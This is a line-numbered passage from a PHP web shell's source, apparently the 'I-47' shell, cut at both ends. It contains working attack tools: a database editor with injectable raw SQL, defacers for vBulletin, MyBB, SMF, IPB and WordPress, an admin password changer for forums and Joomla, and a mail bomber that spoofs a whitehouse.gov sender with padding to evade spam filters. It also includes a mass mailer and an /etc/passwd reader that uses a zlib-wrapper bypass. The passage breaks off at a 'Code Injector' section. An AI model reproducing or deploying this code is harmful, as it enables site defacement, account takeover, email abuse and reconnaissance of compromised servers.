  2760. }
  2761. }
  2762.  
  2763. // Delete Table Data
  2764. if($_GET['action'] == "deleteData")
  2765. {
  2766. $dbserver = $_COOKIE["dbserver"];
  2767. $dbuser = $_COOKIE["dbuser"];
  2768. $dbpass = $_COOKIE["dbpass"];
  2769. $dbname = $_GET['dbname'];
  2770. $tablename = $_GET['tablename'];
  2771. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  2772. mysql_select_db($dbname);
  2773. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
  2774. $row = mysql_fetch_array($sql);
  2775. $row = $row['COLUMN_NAME'];
  2776. $rowid = $_GET[$row];
  2777. mysql_query("delete from $tablename where $row = '$rowid'");
  2778. header("Location:$self?action=viewdata&dbname=$dbname&tablename=$tablename");
  2779. }
  2780. // Edit Table Data
  2781. if($_GET['action'] == "editData")
  2782. {
  2783. global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
  2784. $dbserver = $_COOKIE["dbserver"];
  2785. $dbuser = $_COOKIE["dbuser"];
  2786. $dbpass = $_COOKIE["dbpass"];
  2787. $dbname = $_GET['dbname'];
  2788. $tablename = $_GET['tablename'];
  2789. echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
  2790. ?>
  2791. <br><br>
  2792. <form action="<?php echo $self; ?>" method="post">
  2793. <input type="hidden" name="tablename" value="<?php echo $tablename; ?>">
  2794. <input type="hidden" name="action" value="editsubmitData">
  2795. <?php
  2796. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  2797. mysql_select_db($dbname);
  2798.  
  2799. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
  2800. $row = mysql_fetch_array($sql);
  2801. $row = $row['COLUMN_NAME'];
  2802. $rowid = $_GET[$row];
  2803.  
  2804. $pResult = mysql_list_fields( $dbname, $tablename );
  2805. $num = mysql_num_fields( $pResult );
  2806.  
  2807. $key = "";
  2808. for( $i = 0; $i < $num; $i++ )
  2809. {
  2810. $field = mysql_fetch_field( $pResult, $i );
  2811. if( $field->primary_key == 1 )
  2812. if( $field->numeric == 1 )
  2813. $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
  2814. else
  2815. $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
  2816. }
  2817. $key = substr( $key, 0, strlen($key)-4 );
  2818.  
  2819. mysql_select_db( $dbname, $mysqlHandle );
  2820. $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
  2821. $data = mysql_fetch_array( $pResult );
  2822.  
  2823.  
  2824. echo "<input type=hidden name=dbname value=$dbname>\n";
  2825. echo "<input type=hidden name=tablename value=$tablename>\n";
  2826. echo "<input type=hidden name=$row value=$rowid>";
  2827. echo "<table cellspacing=1 cellpadding=2 border=1>\n";
  2828. echo "<tr>\n";
  2829. echo "<th>Name</th>\n";
  2830. echo "<th>Type</th>\n";
  2831. echo "<th>Function</th>\n";
  2832. echo "<th>Data</th>\n";
  2833. echo "</tr>\n";
  2834.  
  2835. $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
  2836. $num = mysql_num_rows( $pResult );
  2837.  
  2838. $pResultLen = mysql_list_fields( $dbname, $tablename );
  2839.  
  2840. for( $i = 0; $i < $num; $i++ )
  2841. {
  2842. $field = mysql_fetch_array( $pResult );
  2843. $fieldname = $field["Field"];
  2844. $fieldtype = $field["Type"];
  2845. $len = mysql_field_len( $pResultLen, $i );
  2846.  
  2847. echo "<tr>";
  2848. echo "<td>$fieldname</td>";
  2849. echo "<td>".$field["Type"]."</td>";
  2850. echo "<td>\n";
  2851. echo "<select name=${fieldname}_function class=sbox>\n";
  2852. echo "<option>\n";
  2853. echo "<option>ASCII\n";
  2854. echo "<option>CHAR\n";
  2855. echo "<option>SOUNDEX\n";
  2856. echo "<option>CURDATE\n";
  2857. echo "<option>CURTIME\n";
  2858. echo "<option>FROM_DAYS\n";
  2859. echo "<option>FROM_UNIXTIME\n";
  2860. echo "<option>NOW\n";
  2861. echo "<option>PASSWORD\n";
  2862. echo "<option>PERIOD_ADD\n";
  2863. echo "<option>PERIOD_DIFF\n";
  2864. echo "<option>TO_DAYS\n";
  2865. echo "<option>USER\n";
  2866. echo "<option>WEEKDAY\n";
  2867. echo "<option>RAND\n";
  2868. echo "</select>\n";
  2869. echo "</td>\n";
  2870. $value = htmlspecialchars($data[$i]);
  2871. $type = strtok( $fieldtype, " (,)\n" );
  2872. if( $type == "enum" || $type == "set" )
  2873. {
  2874. echo "<td>\n";
  2875. if( $type == "enum" )
  2876. echo "<select name=$fieldname class=box>\n";
  2877. else if( $type == "set" )
  2878. echo "<select name=$fieldname size=4 class=box multiple>\n";
  2879. while( $str = strtok( "'" ) )
  2880. {
  2881. if( $value == $str )
  2882. echo "<option selected>$str\n";
  2883. else
  2884. echo "<option>$str\n";
  2885. strtok( "'" );
  2886. }
  2887. echo "</select>\n";
  2888. echo "</td>\n";
  2889. }
  2890. else
  2891. {
  2892. if( $len < 40 )
  2893. echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\" class=box></td>\n";
  2894. else
  2895. echo "<td><textarea cols=47 rows=3 maxlength=$len name=$fieldname class=box>$value</textarea>\n";
  2896. }
  2897. echo "</tr>";
  2898. }
  2899. echo "</table><p>\n";
  2900. echo "<input type=submit value='Edit Data' class=but>\n";
  2901. echo "<input type=button value='Cancel' onClick='history.back()' class=but>\n";
  2902. echo "</form>\n";
  2903. }
  2904. }
  2905.  
  2906. // Edit Submit Table Data
  2907. else if($_REQUEST['action'] == "editsubmitData")
  2908. {
  2909. $dbserver = $_COOKIE["dbserver"];
  2910. $dbuser = $_COOKIE["dbuser"];
  2911. $dbpass = $_COOKIE["dbpass"];
  2912. $dbname = $_POST['dbname'];
  2913. $tablename = $_POST['tablename'];
  2914.  
  2915. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  2916. mysql_select_db($dbname);
  2917.  
  2918. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
  2919. $row = mysql_fetch_array($sql);
  2920. $row = $row['COLUMN_NAME'];
  2921. $rowid = $_POST[$row];
  2922.  
  2923. $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
  2924. $num = mysql_num_rows( $pResult );
  2925.  
  2926. $rowcount = $num;
  2927.  
  2928. $pResultLen = mysql_list_fields( $dbname, $tablename );
  2929.  
  2930.  
  2931.  
  2932. for( $i = 0; $i < $num; $i++ )
  2933. {
  2934. $field = mysql_fetch_array( $pResult );
  2935. $fieldname = $field["Field"];
  2936. $arrdata = $_REQUEST[$fieldname];
  2937.  
  2938.  
  2939. $str .= " " . $fieldname . " = '" . $arrdata . "'";
  2940. $rowcount--;
  2941. if($rowcount != 0)
  2942. $str .= ",";
  2943. }
  2944.  
  2945. $str = "update $tablename set" . $str . " where $row=$rowid";
  2946. mysql_query($str);
  2947. header("Location:$self?action=viewdata&dbname=$dbname&tablename=$tablename");
  2948. }
  2949. else if(isset($_GET['logoutdb']))
  2950. {
  2951. setcookie("dbserver",time() - 60*60);
  2952. setcookie("dbuser",time() - 60*60);
  2953. setcookie("dbpass",time() - 60*60);
  2954. header("Location:$self?database");
  2955. }
  2956.  
  2957. // Forum Manager
  2958. else if(isset($_GET["forum"]))
  2959. { ?>
  2960. <center><table><tr><td><a href="<?php echo $self; ?>?forum&defaceforum"><font color="lime" size="4">| Forum Defacer |</font></a></td>
  2961. <td><a href="<?php echo $self; ?>?forum&passwordchange"><font color="lime" size="4">| Forum Password Changer |</font></a></td>
  2962. </tr></table></center><br>
  2963. <?php
  2964. if(isset($_GET["defaceforum"]))
  2965. {
  2966. ?>
  2967. <center>
  2968. <font color="#FF0000" size="4">Vbulletin Forum Index Changer</font>
  2969. <form action="<?php echo $self; ?>" method = "POST">
  2970. <table border = "1" width="50%" height="316" style="text-align: center" align="center">
  2971. <tr>
  2972. <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
  2973. <p>
  2974. Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
  2975. </p>
  2976. </tr>
  2977. <tr>
  2978. <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack VB" name="forumdeface"></td>
  2979. </tr>
  2980. </table>
  2981. </form>
  2982.  
  2983. <font color="#FF0000" size="4">MyBB Forum Index Changer</font>
  2984. <form action="<?php echo $self; ?>" method = "POST">
  2985. <table border = "1" width="50%" height="316" style="text-align: center" align="center">
  2986. <tr>
  2987. <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
  2988. <p>
  2989. Table Prefix : <input type="text" name="prefix" value="mybb_" class="sbox"> (Optional)</td>
  2990. </p>
  2991. </td>
  2992. </tr>
  2993. <tr>
  2994. <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack MyBB" name="forumdeface"></td>
  2995. </tr>
  2996. </table>
  2997. </form>
  2998.  
  2999. <font color="#FF0000" size="4">SMF Forum Index Changer</font>
  3000. <form action="<?php echo $self; ?>" method = "POST">
  3001. <table border = "1" width="50%" height="316" style="text-align: center" align="center">
  3002. <tr>
  3003. <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
  3004. <p>
  3005. Table Prefix : <input type="text" name="prefix" value="smf_" class="sbox"> (Optional)</td>
  3006. </p>
  3007. </td>
  3008. </tr>
  3009. <tr>
  3010. <td height="105" width="780"><p align="center"><b>Message&nbsp;:</b> <input class="box" type="text" name="index" size="20" value="lol ! You Are Hacked !!!!"></p><b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">&nbsp;<input type = "submit" class="but" value = "Hack SMF" name="forumdeface"></p></td>
  3011.  
  3012. </tr>
  3013. </table>
  3014. </form>
  3015.  
  3016. <font color="#FF0000" size="4">IPB Forum Index Changer</font>
  3017. <form action="<?php echo $self; ?>" method = "POST">
  3018. <table border = "1" width="50%" height="316" style="text-align: center" align="center">
  3019. <tr>
  3020. <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20"></td>
  3021. </tr>
  3022. <tr>
  3023. <td height="167" width="780"><p align="center">&nbsp;<textarea class="box" name="index" cols=53 rows=8>lol ! You Are Hacked !!!!</textarea><p align="center"><input type = "submit" class="but" value = "Hack IPB" name="forumdeface"></td>
  3024. </tr>
  3025. </table>
  3026. </form>
  3027.  
  3028. <font color="#FF0000" size="4">Wordpress Index Changer</font>
  3029. <form action="<?php echo $self; ?>" method = "POST">
  3030. <table border = "1" width="50%" height="316" style="text-align: center" align="center">
  3031. <tr>
  3032. <td height="105" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
  3033. <p>
  3034. Table Prefix : <input type="text" name="prefix" value="wp_" class="sbox"> (Optional)</td>
  3035. </p>
  3036. </td>
  3037. </tr>
  3038. <tr>
  3039. <td height="105" width="780"><p align="center"><b>Message&nbsp;:</b> <input class="box" type="text" name="index" size="20" value="lol ! You Are Hacked !!!!"></p><b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">&nbsp;<input type = "submit" class="but" value = "Hack wordpress" name="forumdeface"></p></td>
  3040.  
  3041. </tr>
  3042. </table>
  3043. </form>
  3044. </center>
  3045. <?php
  3046. }
  3047. else if(isset($_GET["passwordchange"]))
  3048. {
  3049. echo "<center>";
  3050. if(isset($_GET['changed']))
  3051. { ?><font color="lime" size="3"><blink>Password Changed Successfully</blink></font><br><br><?php }
  3052. else if(isset($_GET['cannotchange']))
  3053. { ?><font color="#FF0000" size="3"><blink>Cannot Change Password</blink></font><br><br> <?php } ?>
  3054.  
  3055. <font color="#FF0000" size="4">Vbulletin Forum Password Changer</font>
  3056. <form action="<?php echo $self; ?>" method = "POST">
  3057. <input type="hidden" name="forums" value="vb">
  3058. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
  3059. <tr>
  3060. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
  3061. <p>
  3062. Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
  3063. </p>
  3064. </tr>
  3065. <tr>
  3066. <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
  3067. </tr>
  3068. </table>
  3069. </form>
  3070.  
  3071. <font color="#FF0000" size="4">MyBB Forum Password Changer</font>
  3072. <form action="<?php echo $self; ?>" method = "POST" name="mybb">
  3073. <input type="hidden" name="forums" value="mybb">
  3074. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
  3075. <tr>
  3076. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
  3077. <p>
  3078. Table Prefix : <input type="text" name="prefix" value="mybb_" class="sbox"> (Optional)</td>
  3079. </p>
  3080. </tr>
  3081. <tr>
  3082. <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
  3083. </tr>
  3084. </table>
  3085. </form>
  3086.  
  3087. <font color="#FF0000" size="4">SMF Forum Password Changer</font>
  3088. <form action="<?php echo $self; ?>" method = "POST" name="smf">
  3089. <input type="hidden" name="forums" value="smf">
  3090. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
  3091. <tr>
  3092. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
  3093. <p>
  3094. Table Prefix : <input type="text" name="prefix" value="smf_" class="sbox"> (Optional)</td>
  3095. </p>
  3096. </tr>
  3097. <tr>
  3098. <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
  3099. </tr>
  3100. </table>
  3101. </form>
  3102.  
  3103. <font color="#FF0000" size="4">Phpbb Forum Password Changer</font>
  3104. <form action="<?php echo $self; ?>" method = "POST">
  3105. <input type="hidden" name="forums" value="phpbb">
  3106. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
  3107. <tr>
  3108. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
  3109. <p>
  3110. Table Prefix : <input type="text" name="prefix" value="phpbb_" class="sbox"> (Optional)</td>
  3111. </p>
  3112. </tr>
  3113. <tr>
  3114. <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
  3115. </tr>
  3116. </table>
  3117. </form>
  3118.  
  3119. <font color="#FF0000" size="4">IPB Forum Password Changer</font>
  3120. <form action="<?php echo $self; ?>" method = "POST" name="ipb">
  3121. <input type="hidden" name="forums" value="ipb">
  3122. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
  3123. <tr>
  3124. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
  3125. <p>
  3126. Table Prefix : <input type="text" name="prefix" class="sbox"> (Optional)</td>
  3127. </p>
  3128. </tr>
  3129. <tr>
  3130. <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
  3131. </tr>
  3132. </table>
  3133. </form>
  3134.  
  3135. <a name="wordp" id="wordp">
  3136. <font color="#FF0000" size="4">Wordpress Password Changer</font>
  3137. <form action="<?php echo $self; ?>" method = "POST" name="wp">
  3138. <input type="hidden" name="forums" value="wp">
  3139. <a name="wordp" id="wordp">
  3140. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
  3141. <tr>
  3142. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
  3143. <p>
  3144. Table Prefix : <input type="text" name="prefix" value="wp_" class="sbox"> (Optional)</td>
  3145. </p>
  3146. </tr>
  3147. <tr>
  3148. <td height="70" width="780"><p align="center"><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1"></p><p><b>New Username :</b> <input class="sbox" type="text" name="uname" size="20" value="admin">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
  3149. </tr>
  3150. </table>
  3151. </form>
  3152.  
  3153. <div name="jooml" id="jooml">
  3154. <font color="#FF0000" size="4">Joomla Password Changer</font>
  3155. <form action="<?php echo $self; ?>" method = "POST">
  3156. <input type="hidden" name="forums" value="joomla">
  3157. <table border = "1" width="50%" height="246" style="text-align: center" align="center">
  3158. <tr>
  3159. <td height="100" width="780"> <p align="center"><b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost">&nbsp;<b> DataBase&nbsp;:</b> <input type ="text" class="sbox" name = "f2" size="20"></p> <p align="center">&nbsp;<b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> <b>&nbsp;Password :</b>&nbsp; <input class="sbox" type ="text" name = "f4" size="20">
  3160. <p>
  3161. Table Prefix : <input type="text" name="prefix" value="jos_" class="sbox"> (Optional)</td>
  3162. </p>
  3163. </tr>
  3164. <tr>
  3165. <td height="70" width="780"><p align="center"><b>New Username :</b> <input class="sbox" type="text" name="uname" size="20" value="admin">&nbsp;<b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><input type = "submit" class="but" value = "Change It" name="forumpass"></td>
  3166. </tr>
  3167. </table>
  3168. </form>
  3169. <?php
  3170. if(isset($_GET['changed']))
  3171. { ?><font color="lime" size="3"><blink>Password Changed Successfully</blink></font><br><br><?php }
  3172. else if(isset($_GET['cannotchange']))
  3173. { ?><font color="#FF0000" size="3"><blink>Cannot Change Password</blink></font><br><br> <?php } ?>
  3174. </center>
  3175. <?php
  3176. }
  3177. }
  3178.  
  3179.  
  3180. // Mail
  3181.  
  3182. else if(isset($_GET['mailbomb']))
  3183. { ?>
  3184. <center><table><tr><td><a href="<?php echo $self; ?>?bomb&mailbomb"><font color="lime" size="4">| Mail Bomber |</font></a></td><td><a href="<?php echo $self; ?>?mail&mailbomb"><font color="lime" size="4">| Mass Mailer |</font></a></td></tr></table></center><br>
  3185. <?php
  3186. if(isset($_GET['bomb']))
  3187. {
  3188. if(
  3189. isset($_GET['to']) &&
  3190. isset($_GET['subject']) &&
  3191. isset($_GET['message']) &&
  3192. isset($_GET['times']) &&
  3193. $_GET['to'] != '' &&
  3194. $_GET['subject'] != '' &&
  3195. $_GET['message'] != '' &&
  3196. $_GET['times'] != ''
  3197. )
  3198. {
  3199. $times = $_GET['times'];
  3200. while($times--)
  3201. {
  3202. if(isset($_GET['padding']))
  3203. {
  3204. $fromPadd = rand(0,9999);
  3205. $subjectPadd = " -- ID : ".rand(0,9999999);
  3206. $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
  3207.  
  3208. }
  3209. $from = "president$fromPadd@whitehouse.gov";
  3210. if(!mail($_GET['to'],$_GET['subject'].$subjectPadd,$_GET['message'].$messagePadd,"From:".$from))
  3211. {
  3212. $error = 1;
  3213. echo "<center><font color=red size=3><blink><blink>Some Error Occured!</blink></font></center>";
  3214. break;
  3215. }
  3216. }
  3217. if($error != 1)
  3218. {
  3219. echo "<center><font color=lime size=3><blink>Mail(s) Sent!</blink></font></center>";
  3220. }
  3221. }
  3222. else
  3223. {
  3224. ?>
  3225. <form method="GET">
  3226. <input type="hidden" name="bomb" />
  3227. <input type="hidden" name="mailbomb" />
  3228. <table id="margins" style="width:100%;">
  3229. <tr>
  3230. <td style="width:30%;">
  3231. To
  3232. </td>
  3233. <td>
  3234. <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
  3235. </td>
  3236. </tr>
  3237.  
  3238. <tr>
  3239. <td style="width:30%;">
  3240. Subject
  3241. </td>
  3242. <td>
  3243. <input type="text" class="box" name="subject" value="I-47 Here!" onFocus="if(this.value == 'I-47 Here!')this.value = '';" onBlur="if(this.value=='')this.value='I-47 Here!';" />
  3244. </td>
  3245. </tr>
  3246. <tr>
  3247. <td style="width:30%;">
  3248. No. of Times
  3249. </td>
  3250. <td>
  3251. <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
  3252. </td>
  3253. </tr>
  3254.  
  3255. <tr>
  3256. <td style="width:30%;">
  3257.  
  3258. Pad your message (Less spam detection)
  3259.  
  3260. </td>
  3261. <td>
  3262.  
  3263. <input type="checkbox" name="padding"/>
  3264.  
  3265. </td>
  3266. </tr>
  3267. <tr>
  3268. <td colspan="2">
  3269. <textarea name="message" cols="110" rows="10" class="box">Hello !! This is I-47!!</textarea>
  3270. </td>
  3271. </tr>
  3272.  
  3273.  
  3274. <tr>
  3275. <td rowspan="2">
  3276. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value=" Bomb! "/>
  3277. </td>
  3278. </tr>
  3279. </table>
  3280. </form>
  3281. <?php
  3282. }
  3283. }
  3284. //Mass Mailer
  3285.  
  3286. else if(isset($_GET['mail']))
  3287. {
  3288. if
  3289. (isset($_GET['to']) && isset($_GET['from']) && isset($_GET['subject']) && isset($_GET['message']))
  3290. {
  3291. if(mail($_GET['to'],$_GET['subject'],$_GET['message'],"From:".$_GET['from']))
  3292. {
  3293. echo "<center><font color=lime size=3><blink>Mail Sent!</blink></font></center>";
  3294. }
  3295. else
  3296. {
  3297. echo "<center><font color=red size=3><blink>Some Error Occured!</blink></font></center>";
  3298. }
  3299. }
  3300. else
  3301. {
  3302. ?>
  3303. <div align="left">
  3304. <form method="GET">
  3305. <input type="hidden" name="mail" />
  3306. <input type="hidden" name="mailbomb" />
  3307. <table align="left" style="width:100%;">
  3308. <tr>
  3309. <td style="width:10%;">From</td>
  3310. <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'president@whitehouse.gov')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.gov';"/></td>
  3311. </tr>
  3312.  
  3313. <tr>
  3314. <td style="width:20%;">To</td>
  3315. <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
  3316. </tr>
  3317.  
  3318. <tr>
  3319. <td style="width:20%;">Subject</td>
  3320. <td style="width:80%;"><input type="text" class="box" name="subject" value="I-47 Here!!" onFocus="if(this.value == 'I-47 Here!!')this.value = '';" onBlur="if(this.value=='')this.value='I-47 Here!!';" /></td>
  3321. </tr>
  3322.  
  3323.  
  3324. <tr>
  3325. <td colspan="2">
  3326. <textarea name="message" cols="110" rows="10" class="box">Hello !! This is I-47!!!</textarea>
  3327. </td>
  3328. </tr>
  3329.  
  3330.  
  3331. <tr>
  3332. <td rowspan="2">
  3333. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value=" Send! "/>
  3334. </td>
  3335. </tr>
  3336. </table>
  3337. </form></div>
  3338. <?php
  3339. }
  3340. }
  3341. }
  3342.  
  3343. // View Passwd file
  3344.  
  3345. else if(isset($_GET['passwd']))
  3346. {
  3347. $test='';
  3348. $tempp= tempnam($test, "cx");
  3349. $get = "/etc/passwd";
  3350. if(copy("compress.zlib://".$get, $tempp))
  3351. {
  3352. $fopenzo = fopen($tempp, "r");
  3353. $freadz = fread($fopenzo, filesize($tempp));
  3354. fclose($fopenzo);
  3355. $source = htmlspecialchars($freadz);
  3356. echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
  3357. unlink($tempp);
  3358. }
  3359. else
  3360. {
  3361. if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
  3362. {
  3363. $temp = "";
  3364. for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
  3365. {
  3366. $uid = @posix_getpwuid($_GET['val1']);
  3367. if ($uid)
  3368. $temp .= join(':',$uid)."\n";
  3369. }
  3370. echo '<br/>';
  3371. paramexe('Users', $temp);
  3372. }
  3373. else
  3374. {
  3375. ?>
  3376. <form>
  3377. <input type="hidden" name="passwd">
  3378. <table border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
  3379. <tr>
  3380. <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
  3381. </tr>
  3382. <tr>
  3383. <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
  3384. </tr>
  3385. <tr>
  3386. <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
  3387. </tr>
  3388. </table><br>
  3389. </form>
  3390. <?php
  3391. }
  3392. }
  3393. }
  3394.  
  3395.  
  3396. // Code Injector
  3397.  
  3398. else if(isset($_GET['injector']))
  3399. {
  3400. ?>
